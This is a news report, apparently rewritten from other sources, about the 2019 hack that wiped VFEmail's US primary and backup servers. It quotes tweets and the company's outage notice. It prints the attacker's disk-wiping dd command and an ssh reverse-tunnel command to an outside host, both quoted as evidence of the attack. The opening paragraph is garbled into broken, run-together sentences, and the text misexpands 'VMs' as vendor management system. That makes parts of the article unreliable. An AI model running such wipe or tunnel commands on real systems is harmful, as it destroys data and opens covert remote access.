Hackers have breached the U.S. servers of privacy-focused VFEmail.net and wiped were hacked into on February 11 and destroying on primary and the backup system’s data. attack down without notice the company’s site and webmail client is calling “catastrophic destruction” . some 60,000 emails sent and received over more than a decade
“This is not looking good,” the company tweeted.
Yes, @VFEmail is effectively gone. It will likely not return.
I never thought anyone would care about my labor of love so much that they’d want to completely and thoroughly destroy it.
— Havokmon (@Havokmon) February 12, 2019
It added: “
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null firstname.lastname@example.org -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019
After hack Two hours later, VFEmail announced on official Twitter handle that the hackers were able to format each and every disk on all servers, with all(Vendor management system) VMs, lost in the process.
Email provider VFEmail’s US servers Hacked After Catastrophic Data Loss
“I have an account with that site, all the email in my account was deleted,” Senchak said.
VFEmail is the first service which gets its data destroyed in a hacking attack without receiving a ransom note to avoid catastrophic data loss.
VFEmail developer says statement posted to its website gave more details. It also pointed to an IP address which looks to be registered in Bulgaria.
!!!ALERT!!!! Update Feb 11 2019
www.vfemail.net and mail.vfemail.net are currently unavailable.
We have suffered catastrophic destruction at the hands of a hacker, last seen as email@example.com
This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.
New updates 2/11/19 6pm CST:
- Incoming mail is now being delivered.
- Webmail is up. Note-mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.
- Mailboxes are new, no subfolders exist.
- No filters are in place. If you created a filter with Horde, Login to Horde, Create any folders you need.
Click Filter, Click Script, then click ‘Activate Script’.
- There is no spam scanning at this time – Incoming mail may be Spam scanned depending on DNS status.
- Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be useable, including Horde/Roundcube contacts and calendars.
At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.
If you reconnect your client to your new mailbox, all your local mail will be lost